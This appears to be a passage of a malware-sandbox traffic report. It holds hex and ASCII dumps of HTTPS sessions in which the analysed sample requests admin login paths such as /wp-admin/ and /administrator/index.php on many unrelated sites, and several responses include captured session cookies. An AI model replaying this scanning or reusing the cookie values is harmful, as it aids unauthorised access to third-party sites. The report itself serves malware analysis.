                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1304INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 73 73 69 64 3d 75 73 30 34 5f 63 5f 42 36 6b 44 2d 50 44 64 52 50 79 6c 53 62 61 38 55 6c 43 4a 49 77 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 63 72 65 64 3d 33 46 32 31 45 32 45 38 36 37 32 37 35 36 31 37 30 42 32 32 35 34 35 46 31 39 36 46 39 39 36 46 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 63 74 61 69 64 3d 4f 5a 36 6b 42 7a 32 69 51 52 75 54 6c 67 5a 6e 2d 77 68 6d 64 77 2e 31 37 30 37 31 33 31 37 37 30 32 38 39 2e 32 32 61 65 61 31 39 34 33 35 37 39 32 34 32 36 34 32 66 66 64 31 33 33 33
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: set-cookie: _zm_ssid=us04_c_B6kD-PDdRPylSba8UlCJIw; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: cred=3F21E2E8672756170B22545F196F996F; Path=/; Secure; HttpOnlyset-cookie: _zm_ctaid=OZ6kBz2iQRuTlgZn-whmdw.1707131770289.22aea1943579242642ffd1333
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC629INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 76 69 73 69 74 6f 72 5f 67 75 69 64 3d 39 30 37 35 62 35 30 63 37 66 35 65 34 39 64 65 38 36 63 33 66 30 39 65 36 36 65 34 61 33 63 31 3b 20 4d 61 78 2d 41 67 65 3d 33 31 35 33 36 30 30 30 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 30 34 20 46 65 62 20 32 30 32 35 20 31 31 3a 31 36 3a 31 30 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 0d 0a 78 2d 7a 6d 2d 7a 6f 6e 65 69 64 3a 20 56 41 32 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 55 53 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: set-cookie: _zm_visitor_guid=9075b50c7f5e49de86c3f09e66e4a3c1; Max-Age=31536000; Expires=Tue, 04 Feb 2025 11:16:10 GMT; Domain=zoom.us; Path=/; Securex-zm-zoneid: VA2content-language: en-USCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"h
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 36 65 62 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 7a 6f 6f 6d 76 69 64 65 6f 63 61 6c 6c 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 2f 7a 6f 6f 6d 76 69 64 65 6f 63 61 6c 6c 23 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 5a 6f 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6eb7<!doctype html><html xmlns:fb="http://ogp.me/ns/fb#" lang="en-US"><head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# zoomvideocall: http://ogp.me/ns/fb/zoomvideocall#"><title>Page Not Found - Zoom</title><meta http-equiv="X-UA-Compati
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 2c 20 76 69 64 65 6f 20 63 6f 6e 66 65 72 65 6e 63 65 2c 20 6f 6e 6c 69 6e 65 20 6d 65 65 74 69 6e 67 73 2c 20 77 65 62 20 6d 65 65 74 69 6e 67 2c 20 76 69 64 65 6f 20 6d 65 65 74 69 6e 67 2c 20 63 6c 6f 75 64 20 6d 65 65 74 69 6e 67 2c 20 63 6c 6f 75 64 20 76 69 64 65 6f 2c 20 67 72 6f 75 70 20 76 69 64 65 6f 20 63 61 6c 6c 2c 20 67 72 6f 75 70 20 76 69 64 65 6f 20 63 68 61 74 2c 20 73 63 72 65 65 6e 20 73 68 61 72 65 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 73 68 61 72 65 2c 20 6d 6f 62 69 6c 69 74 79 2c 20 6d 6f 62 69 6c 65 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 2c 20 64 65 73 6b 74 6f 70 20 73 68 61 72 65 2c 20 76 69 64 65 6f 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 2c 20 67 72 6f 75 70 20 6d 65 73 73 61 67 69 6e 67 22 20 2f 3e 0a 3c 6d 65 74 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: , video conference, online meetings, web meeting, video meeting, cloud meeting, cloud video, group video call, group video chat, screen share, application share, mobility, mobile collaboration, desktop share, video collaboration, group messaging" /><meta
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 6c 75 74 69 6f 6e 20 75 73 65 64 20 61 72 6f 75 6e 64 20 74 68 65 20 77 6f 72 6c 64 20 69 6e 20 62 6f 61 72 64 2c 20 63 6f 6e 66 65 72 65 6e 63 65 2c 20 68 75 64 64 6c 65 2c 20 61 6e 64 20 74 72 61 69 6e 69 6e 67 20 72 6f 6f 6d 73 2c 20 61 73 20 77 65 6c 6c 20 61 73 20 65 78 65 63 75 74 69 76 65 20 6f 66 66 69 63 65 73 20 61 6e 64 20 63 6c 61 73 73 72 6f 6f 6d 73 2e 20 46 6f 75 6e 64 65 64 20 69 6e 20 32 30 31 31 2c 20 5a 6f 6f 6d 20 68 65 6c 70 73 20 62 75 73 69 6e 65 73 73 65 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 20 62 72 69 6e 67 20 74 68 65 69 72 20 74 65 61 6d 73 20 74 6f 67 65 74 68 65 72 20 69 6e 20 61 20 66 72 69 63 74 69 6f 6e 6c 65 73 73 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 20 74 6f 20 67 65 74 20 6d 6f 72 65 20 64 6f 6e 65 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: lution used around the world in board, conference, huddle, and training rooms, as well as executive offices and classrooms. Founded in 2011, Zoom helps businesses and organizations bring their teams together in a frictionless environment to get more done.
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 70 70 2f 6d 61 72 6b 65 74 5f 6f 6e 65 74 72 75 73 74 5f 63 6f 6f 6b 69 65 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 20 63 6c 61 73 73 3d 22 6f 70 74 61 6e 6f 6e 2d 63 61 74 65 67 6f 72 79 2d 43 30 30 30 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 73 6d 7a 53 53 6c 4a 39 54 42 2d 42 4e 6f 4c 74 79 42 72 68 57 51 22 3e 0a 77 69 6e 64 6f 77 2e 7a 6d 47 6c 6f 62 61 6c 4d 72 6b 74 49 64 20 3d 20 22 39 30 37 35 62 35 30 63 37 66 35 65 34 39 64 65 38 36 63 33 66 30 39 65 36 36 65 34 61 33 63 31 22 20 7c 7c 20 6e 75 6c 6c 3b 0a 77 69 6e 64 6f 77 2e 7a 6d 47 6c 6f 62 61 6c 4d 72 6b 74 4b 65 79 20 3d 20 22 22 20 7c 7c 20 6e 75 6c 6c 3b 0a 77 69 6e 64 6f 77 5b 27 6f 70 74 69 6d 69 7a 65 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: pp/market_onetrust_cookie.min.js" type="text/plain" class="optanon-category-C0004"></script><script nonce="smzSSlJ9TB-BNoLtyBrhWQ">window.zmGlobalMrktId = "9075b50c7f5e49de86c3f09e66e4a3c1" || null;window.zmGlobalMrktKey = "" || null;window['optimizel
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 33 36 32 30 30 3b 0a 7d 0a 2e 65 78 70 69 72 65 64 2d 63 63 2d 62 61 6e 6e 65 72 20 2e 7a 6d 2d 69 63 6f 6e 2d 65 72 72 6f 72 20 7b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 37 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 45 38 31 37 33 44 3b 0a 7d 0a 2e 65 78 70 69 72 65 64 2d 63 63 2d 62 61 6e 6e 65 72 20 2e 7a 6d 2d 69 63 6f 6e 2d 63 6c 6f 73 65 20 7b 0a 63 6f 6c 6f 72 3a 20 23 31 33 31 36 31 39 3b 0a 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 73 6d 7a 53 53 6c 4a 39 54 42 2d 42 4e 6f 4c 74 79 42 72 68 57 51 22 20 73 72 63 3d 22 2f 63 73 72 66 5f 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 73 6d 7a 53 53 6c 4a 39 54 42 2d 42 4e 6f 4c 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 36200;}.expired-cc-banner .zm-icon-error {font-size: 17px;color: #E8173D;}.expired-cc-banner .zm-icon-close {color: #131619;cursor: pointer;}</style><script nonce="smzSSlJ9TB-BNoLtyBrhWQ" src="/csrf_js"></script><script nonce="smzSSlJ9TB-BNoLt
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 4d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6f 74 2d 63 6f 6f 6b 69 65 2d 70 72 65 66 27 29 3b 0a 69 66 28 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 29 20 7b 0a 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 2e 74 65 78 74 20 3d 20 24 2e 69 31 38 6e 2e 67 65 74 28 22 6d 61 72 6b 65 74 69 6e 67 2e 70 72 69 76 61 63 79 2e 6f 6e 65 74 72 75 73 74 2e 63 6f 6f 6b 69 65 5f 70 72 65 66 22 29 3b 0a 7d 0a 76 61 72 20 6f 6e 65 54 72 75 73 74 43 6f 6e 73 65 6e 74 49 64 20 3d 20 4f 6e 65 54 72 75 73 74 2e 67 65 74 44 61 74 61 53 75 62 6a 65 63 74 49 64 28 29 3b 0a 76 61 72 20 61 63 74 69 76 65 47 72 6f 75 70 73 20 3d 20 28 4f 6e 65 74 72 75 73 74 41 63 74 69 76 65 47 72 6f 75 70 73 20 7c 7c 20 27 27 29 2e 73 70 6c 69 74 28 27 2c 27 29
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: M = document.getElementById('ot-cookie-pref');if(cookiePrefDOM) {cookiePrefDOM.text = $.i18n.get("marketing.privacy.onetrust.cookie_pref");}var oneTrustConsentId = OneTrust.getDataSubjectId();var activeGroups = (OnetrustActiveGroups || '').split(',')
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 64 6b 2d 73 68 6f 77 2d 73 65 74 74 69 6e 67 73 20 7b 0a 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0a 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 70 78 20 73 6f 6c 69 64 3b 0a 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 32 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0a 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 6c 65 66 74 3a 20 36 70 78 3b 0a 74 6f 70 3a 20 35 30 25 3b 0a 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: dk-show-settings {padding-left: 10px;border-left: 1px solid;margin-left: 10px;}#ot-do-not-sell {position: relative;padding-left: 42px !important;}#ot-do-not-sell::before {content: "";position: absolute;left: 6px;top: 50%;transform: translate
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 68 42 75 74 74 6f 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 73 65 61 72 63 68 42 6f 78 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 42 75 74 74 6f 6e 49 63 6f 6e 22 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 65 6e 61 62 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 3d 22 6e 65 77 20 30 20 30 20 32 30 20 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 20 72 6f 6c 65 3d 22 69 6d 67 22 3e 0a 3c 67 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 3e 0a 3c 70 61 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: hButton" aria-expanded="false" aria-controls="searchBox" tabindex="0"><span class="searchButtonIcon"><svg xmlns="http://www.w3.org/2000/svg" focusable="false" enable-background="new 0 0 20 20" viewBox="0 0 20 20" role="img"><g fill="currentColor"><pat


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                127192.168.2.663978164.100.128.15443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC176OUTGET /wp-admin/ HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: upsconline.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC252INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 954
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC954INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 7d 0a 2e 73 74 79 6c 65 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 7d 0a 2e 73 74 79 6c 65 32 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 09 66 6f 6e 74 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><meta charset="utf-8"/><title>404 - this page does not exist</title><style type="text/css">body {margin-left: 0px;margin-top: 0px;margin-right: 0px;margin-bottom: 0px;}.style1 {font-size: 18px}.style2 {font-size: 18px;font-


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                128192.168.2.6629863.134.125.175443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC202OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC249INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Error-Code: ERR_NGROK_3200
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: c2e440e820bef3ad20b52a5585ed00ed
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC937INData Raw: 39 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 68 2d 66 75 6c 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 65 75 63 6c 69 64 2d 73 71 75 61 72 65 2f 45 75 63 6c 69 64 53 71 75 61 72 65 2d 52 65 67 75 6c 61 72 2d 57 65 62 53 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 977<!DOCTYPE html><html class="h-full" lang="en-US" dir="ltr"> <head> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/euclid-square/EuclidSquare-Regular-WebS.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1498INData Raw: 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 69 62 6d 2d 70 6c 65 78 2d 6d 6f 6e 6f 2f 49 42 4d 50 6c 65 78 4d 6f 6e 6f 2d 54 65 78 74 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 69 62 6d 2d 70 6c 65 78 2d 6d 6f 6e 6f 2f 49 42 4d 50 6c 65 78 4d 6f 6e 6f 2d 54 65 78 74 49 74 61 6c 69 63 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ef="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-Text.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-TextItalic.woff" as="font" type="f


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                129192.168.2.6634103.141.96.53443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC186OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC113INHTTP/1.1 439 <none>
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                                                                                                                                                                                connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                130192.168.2.663700188.212.100.154443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC184OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zarkana2.ro
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC415INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                content-length: 796
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:17:36 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC796INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                131192.168.2.663977195.85.23.95443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC452OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: bonga20120608=d4b62ea767f8c27a8f51fe1000153277; ts_type2=1; __cf_bm=sPKSaJvRUxAcg1PEcdR35O5GebQF9IpP_4Igj06Qn1U-1707131767-1-AfutacbLjRJXJ/HlVv4ccDZ2KwcLDrWfFrasoUlTJQoQXwrk+mYT9PLaGfsipxqCCZnwBC6f5dRn/AaHcx7pL3Q=; uh=IHSAIQqQLaWbpmumq0cKLxuvMUS0Hj==; fv=AmL3ZGZkAmN3ZD==
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC758INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                referrer-policy: origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                x-ua-compatible: IE=edge,chrome=1
                                                                                                                                                                                                                                                                                                                                                                set-cookie: ts_type2=1; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
